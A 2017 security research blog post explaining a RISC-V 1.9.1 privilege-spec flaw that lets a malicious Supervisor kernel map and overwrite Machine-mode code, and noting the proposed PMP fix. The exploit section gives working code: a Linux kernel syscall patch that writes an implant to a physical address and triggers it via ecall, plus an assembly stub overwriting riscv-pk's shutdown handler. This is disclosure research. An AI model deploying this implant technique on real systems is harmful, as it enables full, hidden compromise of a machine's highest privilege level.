Tuesday, April 18, 2017

The RISC-V Files: Supervisor -> Machine Privilege Escalation Exploit

The Demo

The following video demonstrates my original proof-of-concept exploit for the RISC-V privilege escalation logic flaw in the 1.9.1 version of the standard. The exploit lives in a patched Linux kernel, controlled through a simple userland application. The Linux kernel triggers the exploit and breaks out of Supervisor privilege in order to abuse the Machine level privilege. You may need to play the video in full-screen mode to view the console text. 


In the video, the userland application fakesyscall is used to control the exploit living in the Linux kernel. The first option passed to the app (and subsequently to the kernel) is 6. Option 6 simply tells the kernel to dump bytes of memory at a specific address in RAM. Option 8 then overwrites this same memory region with illegal opcodes. Option 6 is used again to verify that the opcodes have been overwritten. 

Finally, option 9 tells the malicious kernel to trigger a call from its own privilege layer (Supervisor) into Machine mode, which executes the overwritten instructions. This causes an unhandled exception in QEMU, displayed at the bottom of the screen at the end of the video ("unhandlable trap 2"). Trap 2 is the illegal instruction trap, which the Machine layer of this implementation (qemu-system-riscv64 and riscv-pk) does not handle. 

A Brief Introduction to RISC-V Privilege

The RISC-V privilege model was initially designed as an ecosystem that consists of four separate layers of privilege: User, Supervisor, Hypervisor, and Machine. The User privilege layer is, of course, the least privileged layer, where common applications are executed. Supervisor is the privilege layer where the operating system kernel (such as Linux, Mach, or Amoeba) lives. The Hypervisor layer was intended to be the layer at which control subsystems for virtualization would live, but has been deprecated in more recent versions of the privilege specification. The Machine layer is the highest privileged layer in RISC-V, and has access to all resources in the system at all times. 


Full compromise of a system with a RISC-V core can't simply mean compromise of both the User and Supervisor privilege layers, which is the goal of most modern attacks. Rather, breaking out of the Supervisor layer into the Machine layer is required. This is because of the capabilities the Machine layer is expected to gain in the future. 

The Hypervisor layer (H-Mode) is currently removed from the 1.10 privilege specification. The intent is that it may be re-added in a future revision of the privilege specification. Alternatively, it could be conglomerated with the Machine layer. Regardless, both layers are designed to control processor functionality that the Supervisor layer cannot access. This includes physical memory regions assigned to other hypervisor guests, restricted peripherals, Hypervisor and Machine registers, and other high-privileged objects. 

In the future, Machine mode may also be used as a subsystem similar to TrustZone or Intel SMM. Trusted keys may be used here to validate executable code running in the Hypervisor or Supervisor layer. It may also support Supervisor's verification of User layer applications. Other critical security goals can be achieved by leveraging the isolation and omnipotence of the Machine layer. Such functionality may be able to detect and disable a Supervisor layer exploit. Thus, escalating privileges from Supervisor layer to Machine layer as quickly as possible is imperative for future-proofing RISC-V exploits.

Resolving the Risk

Before we get into the technical details, it is important to note that the RISC-V team is aware of this privilege escalation problem. I presumed this when I discovered this vulnerability, as anyone with a background in operating system theory or CPU memory models will quickly observe the gap in security caused by the 1.9.1 privilege specification's memory definition. More on that later. 



Regardless, I was unable to find any material showing that the team knew of this security gap and, in my excitement, did not realize that a resolution to this issue had been proposed 15 days prior to my HITB talk. Stefan O'Rear emailed me privately and pointed out the git commit for the proposal, which explained why I was unable to find it (I was using poor search terms in my haste). 

The proposal (for PMP: Physical Memory Protection) can be found on GitHub. In his email to me, Stefan points out that the image QEMU (and Bellard's riscvemu) executes, which contains the bootloader and the embedded Linux kernel/rootfs images, isn't designed for full Machine layer protection, and that it may not be updated with the PMP model in the near future. 

This is a reasonable perspective, but, academically, the exploit is still an important demonstration of flaws in CPU security logic. The target, itself, doesn't have to be an attempt at a perfectly secure system. It is more important that the exploit be proven practical and useful as an exercise. 

Besides, this was the first CPU-level security implementation flaw I've ever discovered on my own. So, I had extra incentive to actually exploit it. ;-)

But PMP Existed!

Correct! For those familiar, there was a PMP definition in the v1.9.1 privilege specification of RISC-V. However, this implementation was considered incomplete and not capable of deployment. This is probably why the qemu-system-riscv* emulators don't support it currently. As the git commit declares, the PMP full proposal scheme was only introduced a couple weeks prior to this post. 

The Vulnerability

The technical vulnerability is actually quite simple, especially if the reader is familiar with common CPU models for memory protection. Each privilege layer is presumed to be isolated from all lower privileged layers during code execution, as one would expect. The CPU itself ensures that registers attributed to a specific privilege layer cannot be accessed from a less privileged layer. Thus, as a policy, Supervisor layer code can never access Machine layer registers. This segmentation helps guarantee that the state of each layer cannot be altered by lower privileged layers. 

However, the original privilege specification defined memory protection in two separate places. First, the mstatus register's VM field defines what memory protection model shall be used during code execution. This can be found in section 3.1.8 of privilege specification v1.9.1. Table 3.3 in that same section outlines the various memory protection/translation schemes currently defined by the RISC-V team. 
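As a rough illustration, the VM field can be pulled out of a raw mstatus value with a mask and a shift. The sketch below assumes the v1.9.1 layout (VM in bits 28:24) and the mode encodings listed in Table 3.3; the helper names are hypothetical and do not come from the specification or riscv-pk.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed v1.9.1 layout: mstatus.VM occupies bits 28:24. */
#define MSTATUS_VM_SHIFT 24
#define MSTATUS_VM_MASK  (0x1fULL << MSTATUS_VM_SHIFT)

/* Assumed encodings from Table 3.3 of the v1.9.1 specification. */
enum vm_mode {
    VM_MBARE = 0,   /* no translation or protection */
    VM_MBB   = 1,   /* single base-and-bound */
    VM_MBBID = 2,   /* separate instruction/data base-and-bound */
    VM_SV32  = 8,   /* page-based, 32-bit virtual addresses */
    VM_SV39  = 9,   /* page-based, 39-bit virtual addresses */
    VM_SV48  = 10   /* page-based, 48-bit virtual addresses */
};

/* Extract the VM field from a raw mstatus value (hypothetical helper). */
static unsigned mstatus_vm(uint64_t mstatus)
{
    return (unsigned)((mstatus & MSTATUS_VM_MASK) >> MSTATUS_VM_SHIFT);
}

/* True when the selected scheme walks Supervisor-managed page tables. */
static int vm_is_paged(unsigned vm)
{
    assert(vm <= 0x1f);
    return vm == VM_SV32 || vm == VM_SV39 || vm == VM_SV48;
}
```

Only the page-based schemes matter for this exploit, since those are the ones where the Supervisor owns the translation tables.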

The second place where memory protection is defined isn't in the Machine layer at all; it's in the Supervisor layer. This is where things get tricky. Because the Supervisor layer is where a traditional operating system kernel would execute, it must be able to alter page tables to support dynamic execution of kernel code and userland applications. Thus, the sptbr (Supervisor Page-Table Base Register), found in section 4.1.10, lets the Supervisor layer choose which page tables are in use, and the Supervisor can freely read and write those tables. 


For those who are unfamiliar, page tables control the translation of virtual memory addresses (va) to physical memory addresses (pa). Page tables also enforce access privileges for each page, e.g. whether the page is readable, writable, or executable. 
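To make the translation step concrete, here is a minimal sketch of how an Sv39-style virtual address is split into page-table indices and how a leaf page-table entry maps a page. The bit positions (V/R/W/X in the low bits, physical page number starting at bit 10) are assumptions based on the published Sv39 layout and should be checked against the specification revision in use; the function names are illustrative only.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed Sv39 geometry: 4 KiB pages, three 9-bit VPN fields. */
#define PAGE_SHIFT 12
#define VPN_BITS   9
#define VPN_MASK   ((1ULL << VPN_BITS) - 1)
#define PTE_PPN_SHIFT 10

/* Assumed PTE permission bits (verify against your spec revision). */
#define PTE_V (1ULL << 0)  /* valid */
#define PTE_R (1ULL << 1)  /* readable */
#define PTE_W (1ULL << 2)  /* writable */
#define PTE_X (1ULL << 3)  /* executable */

/* Index into the page table at the given level (2 = root, 0 = leaf). */
static uint64_t vpn(uint64_t va, int level)
{
    assert(level >= 0 && level <= 2);
    return (va >> (PAGE_SHIFT + VPN_BITS * level)) & VPN_MASK;
}

/* Build a leaf PTE for the 4 KiB page containing physical address pa. */
static uint64_t make_pte(uint64_t pa, uint64_t perms)
{
    return ((pa >> PAGE_SHIFT) << PTE_PPN_SHIFT) | perms | PTE_V;
}

/* Physical address that a leaf PTE yields for a given virtual address. */
static uint64_t translate(uint64_t pte, uint64_t va)
{
    uint64_t page_offset = va & ((1ULL << PAGE_SHIFT) - 1);
    return ((pte >> PTE_PPN_SHIFT) << PAGE_SHIFT) | page_offset;
}
```

Nothing in this arithmetic knows which privilege layer owns the target page: whoever writes the entry decides what physical page it points at and which permission bits are set.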

Because the Machine layer of privilege's executable code resides in physical memory, and the Supervisor layer can create page tables that can access that physical memory, the Machine layer cannot protect itself from the Supervisor layer. 

The attack works this way:
  • A malicious Supervisor kernel determines the physical address of Machine layer code
  • The kernel creates a page table entry that grants itself read/write access to the Machine layer
  • The kernel overwrites Machine layer code with a beneficial implant
  • The kernel triggers a trap to Machine mode, causing the implant to be executed with Machine privileges
It's quite simple! 
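The steps above can be mimicked with a toy model in ordinary C. This is not RISC-V code and not the real PMP semantics: it is a sketch, with made-up names and sizes, showing that when page-table permissions are the only check, a Supervisor that grants itself a writable mapping can overwrite the Machine region, while an additional physical-range check would stop the same write.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define MEM_SIZE     0x3000u  /* toy physical memory: three 4 KiB pages */
#define MACHINE_BASE 0x1000u  /* the middle page stands in for Machine code */
#define MACHINE_SIZE 0x1000u

static uint8_t phys_mem[MEM_SIZE];

/* A mapping the Supervisor created for itself in its own page tables. */
struct mapping {
    uint32_t pa;       /* physical base the mapping points at */
    uint32_t len;      /* length of the mapped window */
    bool     writable; /* permission the Supervisor granted itself */
};

/* Hypothetical PMP-style check: Supervisor may not touch the Machine range. */
static bool pmp_allows(uint32_t pa, uint32_t len)
{
    return pa + len <= MACHINE_BASE || pa >= MACHINE_BASE + MACHINE_SIZE;
}

/* Supervisor store through its mapping; returns false when blocked. */
static bool supervisor_write(const struct mapping *m, uint32_t off,
                             const void *src, uint32_t len, bool pmp_on)
{
    assert(m != NULL && src != NULL);
    if (m->pa > MEM_SIZE || m->len > MEM_SIZE - m->pa)
        return false;                  /* mapping falls outside toy memory */
    if (!m->writable || off > m->len || len > m->len - off)
        return false;                  /* page-table permissions only */
    if (pmp_on && !pmp_allows(m->pa + off, len))
        return false;                  /* physical protection, if present */
    memcpy(&phys_mem[m->pa + off], src, len);
    return true;
}
```

Calling supervisor_write with pmp_on set to false corresponds to the situation described in this post; setting it to true stands in for a platform that enforces something like the PMP proposal.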

The Exploit

The fun part about this vulnerability was not so much discovering it, but writing a useful exploit rather than simply a proof-of-concept that demonstrated code execution. At HITB2017AMS this past week, I used a simple PoC to show that implanted code was indeed executing in Machine mode. However, this is quite boring and has no real value beyond proving the vulnerability. 

A real exploit needs to allow code injection in a way that any arbitrary payload can be implanted and executed within the Machine context, from Supervisor context. To accomplish this, it was necessary to do the following:
  • Identify Machine layer code that the Supervisor can trigger at will
  • Identify an unused or little-used function in that code that can be altered without negative consequence
  • Ensure arbitrary payloads can be stored within this region  


Triggering Machine Layer Code

This is the simplest part of the process. Currently, booting a RISC-V system means using the Proxy Kernel (riscv-pk) as a bootloader. This code lives in the Machine layer and loads an embedded kernel (such as Linux or FreeBSD) into virtual memory. 

The riscv-pk must support the embedded kernel by providing resources, such as access to the console device, information about the RISC-V CPU core the kernel is running on, and other duties usually handled by mask ROM or flash. riscv-pk does this through the ecall instruction, the common instruction used to call the next most privileged layer in the processor. For example, an ecall executed at the User layer will likely be handled at the Supervisor layer. An ecall executed at the Supervisor layer will be handled by the Machine layer. (This is a simplistic explanation that can get more complex with trap redirection, but we won't dive into those waters at this moment). 

So, when the Supervisor (Linux kernel) executes ecall, the Machine layer's trap handler is executed in Machine mode. In riscv-pk, the handler for trap 9 is the mcall_trap function, found in machine/mtrap.c.
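The trap numbers used in this post follow a simple pattern. As a small sketch, assuming the v1.9.1 exception codes (ecall from User is 8, and each higher privilege level adds one), the cause raised by an ecall can be computed from the level that executed it. The names below are illustrative, not taken from riscv-pk.

```c
#include <assert.h>

/* Privilege level encodings (Hypervisor = 2 still existed in v1.9.1). */
enum priv_level { PRIV_U = 0, PRIV_S = 1, PRIV_H = 2, PRIV_M = 3 };

/* Exception codes mentioned in this post (assumed from v1.9.1). */
#define CAUSE_ILLEGAL_INSTRUCTION 2u
#define CAUSE_USER_ECALL          8u

/* Exception code raised by an ecall executed at the given level. */
static unsigned ecall_cause(enum priv_level from)
{
    assert((unsigned)from <= PRIV_M);
    return CAUSE_USER_ECALL + (unsigned)from;
}
```

With these assumptions, ecall_cause(PRIV_S) evaluates to 9, the trap that lands in mcall_trap.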

Unused Functionality

Most of the functionality in mcall_trap must be preserved, to ensure the stability of the system. Overwriting arbitrary instructions here is frowned upon from an exploit developer perspective. Instead, we must target specific functionality to disturb as little of the ecosystem as possible. Fortunately, we can do so with the MCALL_SHUTDOWN feature. 

This feature does precisely what it sounds like: it performs an immediate system shutdown, as if someone hit an ACPI power-off button on a PC. Presumably, we would never do this in a system we've compromised. We want the system live so we can control it! Thus, this is the feature to overwrite. However, only a few instructions can be overwritten here, as the functionality is small. Take a look at the assembly generated by this feature:

    80000dfc:   00008417                auipc   s0,0x8
    80000e00:   20440413                addi    s0,s0,516 # 80009000 <tohost>
    80000e04:   00100793                li      a5,1
    80000e08:   00f43023                sd      a5,0(s0)
    80000e0c:   00f43023                sd      a5,0(s0)
    80000e10:   ff9ff06f                j       80000e08 <mcall_trap+0x18c>

This only gives us 6 instructions to overwrite. Not much can be accomplished in that space! So, instead, we use these few instructions as a stub that jumps to another region of Machine memory, one that the Supervisor cannot reach directly but can reach by forcing a trap to mcall_trap.

We can be a bit clever and overwrite the code that bootstraps the Proxy Kernel, do_reset. This function has zero value for an already running environment! So, why not reclaim the executable space? Reading the objdump of the current riscv-pk, we can see that 60 32-bit instructions (or 120 16-bit compressed instructions) can be stored here. If we simply jump to the do_reset address and perform our real work there, we can get away with quite a bit, especially if we can constantly update this region of memory with any payload we choose. 

Arbitrary Payloads 

Storing arbitrary payloads in this region simply means designing a sufficiently engineered implant stager in our patched malicious Linux (or other) kernel. This feature simply loads the physical memory addresses at which an implant should live, and installs the implant. Easy! There's not much to it. The only catch is ensuring our jump instructions know the address of the target physical memory address (and can reach the address using a single instruction). 

Linux Kernel Patch

The change to the Linux kernel is simple. We simply alter a system call to perform the implant installation and mtrap trigger. This can be done by augmenting any system call with two chunks of code:


                /* install implant at physical address a2 */
                else if(regs->a1 == 8)
                {       
                        uint8_t * c;
                        int i;
                        
                        /* Overwrite an address a2 of maximum size 4096 with
                         * binary code pointed to by a4 of size a3.
                         */
                        printk( 
                                "DONB: overwriting %p:%lx\n",
                                (const void * )regs->a2,
                                regs->a3);
                        
                        x = ioremap(regs->a2, 4096);
                        printk("DONB: remapped to %p\n", x);
                        
                        r = -1;
                        if(!access_ok(VERIFY_READ, regs->a4, regs->a3))
                        {       
                                printk("DONB: bad access_ok\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: access ok\n");
                        if(regs->a3 <= 0 || regs->a3 > 4096)
                        {       
                                printk("DONB: bad a3\n");
                                goto __bad_copy;
                        }
                        
                        printk("DONB: a3 ok\n");
                        
                        if(__copy_from_user(
                                x,
                                (const void * )regs->a4,      
                                regs->a3))
                        {
                                printk("DONB: bad copy from user\n");
                                goto __bad_copy;
                        }

                        printk("DONB: copy ok\n");

                        iounmap(x);

                        /* make the new code visible to instruction fetch */
                        __asm__ __volatile__("fence; fence.i" ::: "memory");

The above code installs an implant at the physical address given in system call argument 2. Argument 4 contains a pointer to a userland buffer holding the binary to be written through the mapped virtual address, and argument 3 contains the size of that binary blob. The final fence and fence.i instructions synchronize the instruction stream with the preceding stores. Because we are altering instruction code, this guarantees that the CPU fetches the updated copy of our executable code and won't execute stale cached instructions once triggered.

                /* trigger implant overwritten at MCALL_SHUTDOWN */
                else if(regs->a1 == 9)
                {       
                        printk("DONB(8): ok, now try the m-hook\n");
                        
                        /* MCALL_SHUTDOWN=6 */
                        __asm__ __volatile__("li a7, 6; ecall; mv %0, a0"
                                : "=r" (r) : : "a0", "a7", "memory");
                        
                        printk("DONB(8): returned = %d\n", r);
                
                }

This code issues an ecall, causing mcall_trap to be executed from Machine mode context. This, in other words, executes our implant at a higher privilege level.

.global callreset
callreset:
        auipc t0, 0
        addi t0, t0, -1578
        addi t0, t0, -1578
        jalr t0

Finally, the above code, written over the MCALL_SHUTDOWN feature in the mcall_trap function, calls our implant at do_reset. The code in my version of riscv-pk expects do_reset at address 0x800001a8 and the overwritten MCALL_SHUTDOWN code at 0x80000dfc. The difference between these two addresses (-3156 bytes) is too large for the 12-bit signed immediate of a single addi, so two addi instructions are needed to generate the proper negative offset. This can probably be done in a cleaner manner. 
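The offset arithmetic can be checked with a few lines of C. The sketch below uses the two addresses quoted above, which are specific to that riscv-pk build; the helper names are hypothetical. It also shows how the same offset splits into an upper part and a 12-bit remainder, the usual way a pc-relative address is divided between auipc and a following instruction.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses quoted above; they are specific to that riscv-pk build. */
#define SHUTDOWN_STUB 0x80000dfcULL  /* where callreset is written */
#define DO_RESET      0x800001a8ULL  /* where the implant lives */

/* addi takes a 12-bit signed immediate. */
static int fits_imm12(int64_t v)
{
    return v >= -2048 && v <= 2047;
}

/* Signed distance from the auipc instruction to the jump target. */
static int64_t pc_offset(uint64_t pc, uint64_t target)
{
    return (int64_t)(target - pc);
}

/* Split an offset into an upper part (in units of 4096) and a 12-bit
 * signed remainder, so that hi20 * 4096 + lo12 == off. */
static void split_hi_lo(int64_t off, int64_t *hi20, int64_t *lo12)
{
    int64_t lo = off & 0xfff;
    if (lo >= 0x800)
        lo -= 0x1000;       /* sign-extend the low 12 bits */
    assert(fits_imm12(lo));
    *lo12 = lo;
    *hi20 = (off - lo) / 4096;
}
```

With these addresses the offset is -3156, which does not fit in one addi immediate but does fit as two steps of -1578. The same offset splits into an upper part of -1 and a remainder of 940, which suggests that an auipc with an upper immediate of 0xfffff followed by a jalr with offset 940 might be one cleaner alternative; that variant is untested here.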

The only requirement left is for the implant at do_reset to restore the stack and return, to avoid crashing by not properly adjusting the Machine mode memory layout. This can be accomplished by returning to the mcall_trap function at an address where it is performing this functionality. In my implementation, there is only one address where this occurs, 0x80000ccc. 


Gimme Code

For working demonstration code, please visit my GitHub archive, where I will track all of my RISC-V related security research. 

More to come!

Best,

Don A. Bailey
Founder/CEO
Lab Mouse Security
Mastodon: @donb@mastodon.social